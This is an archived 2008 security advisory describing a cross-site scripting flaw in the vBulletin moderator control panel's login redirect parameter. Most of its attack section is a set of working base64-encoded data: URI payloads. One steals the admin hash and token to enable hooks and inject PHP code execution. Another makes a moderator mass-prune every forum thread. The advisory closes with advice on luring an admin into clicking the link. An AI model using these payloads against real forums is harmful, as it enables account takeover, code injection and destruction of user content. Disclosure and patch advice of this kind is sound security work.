modcp-xss.txt

2008-06-19T00:00:00
ID PACKETSTORM:67485
Type packetstorm
Reporter Jessica Hope
Modified 2008-06-19T00:00:00

Description

                                        
                                            `======================================================================  
  
Advisory : XSS in modcp index  
Release Date : June 17th 2008  
Application : vBulletin  
Version : vBulletin 3.7.1 PL1 and lower, vBulletin 3.6.10 PL1 and lower  
Platform : PHP  
Vendor URL : http://www.vbulletin.com/  
Authors : Jessica Hope (jessicasaulhope@googlemail.com),  
Friends who wish to remain anonymous.  
  
  
=======================================================================  
  
Overview  
  
Due to various failures in sanitising user input, it is possible to  
construct XSS attacks that are rather damaging.  
  
=======================================================================  
  
Discussion  
  
The XSS in question exists on the login page for the MCP (moderation  
control panel).  
The login script takes a redirect parameter that lacks sanitation, allowing a  
rather easy XSS:  
  
http://localhost/vB3/modcp/index.php?redirect={XSS}  
  
What is even better is that the exploit will work outright if the  
admin/moderator is already logged in;  
if the admin/moderator is not, they will be required to log in.  
However, if an admin  
logs into the MCP, he is also logged into the ACP, allowing the same  
exploit as last time  
(remote PHP code injection via the hooks system).  
  
If you Base64-encode your attack vector using  
the data: URI scheme, the XSS survives the login request and activates after  
the admin/moderator is logged in. A simple example of the above:  
  
http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K  
  
In this case (as per the last case as well), you have an unlimited and  
unaltered XSS space,  
so you're free to invoke some AJAX and have fun.  
Just to give ideas on how this could turn into something larger,  
vBulletin has hooks that operate using eval(), and new hooks can  
be added via the ACP itself. It is trivial to write some JS that not only  
enables hooks but also inserts a nice RFI hook. Here's one using the data  
URI:  
  
data:text/html;base64,PHNjcmlwdD5ldmFsKCJ1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVnLm9wZW4oJ0dFVCcsICdodHRwOi8vbG9jYWxob3N0L3ZCL3VwbG9hZC9hZG1pbmNwL3BsdWdpbi5waHA/ZG89YWRkJywgZmFsc2UpO3JlZy5zZW5kKG51bGwpO3IgPSByZWcucmVzcG9uc2VUZXh0O3Q9J2h0dHA6Ly9sb2NhbGhvc3QvdkIvdXBsb2FkL2FkbWluY3AvcGx1Z2luLnBocCc7aD0nJmFkbWluaGFzaD0nK3Iuc3Vic3RyKHIuaW5kZXhPZignaGFzaFwiJykrMTMsMzIpO3RvPScmc2VjdXJpdHl0b2tlbj0nK3Iuc3Vic3RyKHIuaW5kZXhPZigndG9rZW5cIicpKzE0LDQwKTt0Mj0ncHJvZHVjdD12YnVsbGV0aW4maG9va25hbWU9Zm9ydW1ob21lX3N0YXJ0JmRvPXVwZGF0ZSZ0aXRsZT1mb28mZXhlY3V0aW9ub3JkZXI9MSZwaHBjb2RlPXBocGluZm8oKTsmYWN0aXZlPTEnK2grdG87cjIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJywgdCwgZmFsc2UpO3IyLnNldFJlcXVlc3RIZWFkZXIoZCwgdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7dD0naHR0cDovL2xvY2FsaG9zdC92Qi91cGxvYWQvYWRtaW5jcC9vcHRpb25zLnBocCc7dDI9J2RvPWRvb3B0aW9ucyZzZXR0aW5nW2VuYWJsZWhvb2tzXT0xJytoK3RvO3IyPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJyx0LGZhbHNlKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGQsdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7Iik8L3NjcmlwdD4K  
  
The above will survive a login prompt. It will then, once executed, proceed  
to parse one of the ACP pages and extract the admin hash and token, then  
it will enable hooks and add one that executes phpinfo().  
  
Obviously the above requires an admin in this context. Similar techniques  
could be used to exploit the modcp as usual, banning users, enabling the  
pruning of threads etc.  
  
  
If you want to cause annoyance, you can esally exploit just a  
moderator (and thus have more  
success in the exploit being run). This example enables pruning for  
all forums on all posts:  
  
data:text/html;base64,PHNjcmlwdD5ldmFsKCJ2PSdodHRwOi8vbG9jYWxob3N0L3ZCL21vZGNwL3RocmVhZC5waHA/ZG89Jzt1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz1uZXcgWE1MSHR0cFJlcXVlc3QoKTtyZWcub3BlbignR0VUJyx2KydwcnVuZScsZmFsc2UpO3JlZy5zZW5kKG51bGwpO3I9cmVnLnJlc3BvbnNlVGV4dDtoPScmYWRtaW5oYXNoPScrci5zdWJzdHIoci5pbmRleE9mKCdoYXNoXCInKSsxMywzMik7dG89JyZzZWN1cml0eXRva2VuPScrci5zdWJzdHIoci5pbmRleE9mKCd0b2tlblwiJykrMTQsNDApO3M9J3RocmVhZFsnO3QyPXMrJ29yaWdpbmFsZGF5c29sZGVyXT0wJicrcysnb3JpZ2luYWxkYXlzbmV3ZXJdPTAmJytzKydsYXN0ZGF5c29sZGVyXT0wJicrcysnbGFzdGRheXNuZXdlcl09MCYnK3MrJ3JlcGxpZXNsZWFzdF09MCYnK3MrJ3JlcGxpZXNtb3N0XT0tMSYnK3MrJ3ZpZXdzbGVhc3RdPTAmJytzKyd2aWV3c21vc3RdPS0xJicrcysnaXNzdGlja3ldPS0xJicrcysnc3RhdGVdPWFueSYnK3MrJ3N0YXR1c109YW55JicrcysnZm9ydW1pZF09LTEmJytzKydwb3N0ZWR1c2VyXT0mJytzKyd0aXRsZWNvbnRhaW5zXT0mJytzKydzdWJmb3J1bXNdPTEmdHlwZT1wcnVuZSZkbz1kb3RocmVhZHMnK2grdG87cjI9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7cjIub3BlbignUE9TVCcsdisnZG90aHJlYWRzJyxmYWxzZSk7cjIuc2V0UmVxdWVzdEhlYWRlcihkLHQyLmxlbmd0aCk7cjIuc2V0UmVxdWVzdEhlYWRlcihjLHUpO3IyLnNlbmQodDIpO3g9cjIucmVzcG9uc2VUZXh0O3QyPSdkbz1kb3RocmVhZHNhbGwmdHlwZT1wcnVuZSYnK2grdG8rJyZjcml0ZXJpYT0nK2VzY2FwZSgoeC5zdWJzdHIoeC5pbmRleE9mKCdyaWEnKSsxMiw3NDcpKS5yZXBsYWNlKC8mcXVvdDsvZywnXCInKSk7cjI9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7cjIub3BlbignUE9TVCcsdisnZG90aHJlYWRzYWxsJyxmYWxzZSk7cjIuc2V0UmVxdWVzdEhlYWRlcihkLHQyLmxlbmd0aCk7cjIuc2V0UmVxdWVzdEhlYWRlcihjLHUpO3IyLnNlbmQodDIpOyIpOzwvc2NyaXB0Pg==  
  
  
In order to exploit, just get an admin/moderator to click the link.  
  
=======================================================================  
  
Solution:  
  
Update to 3.7.1 PL2 or 3.6.10 PL2  
  
=======================================================================  
`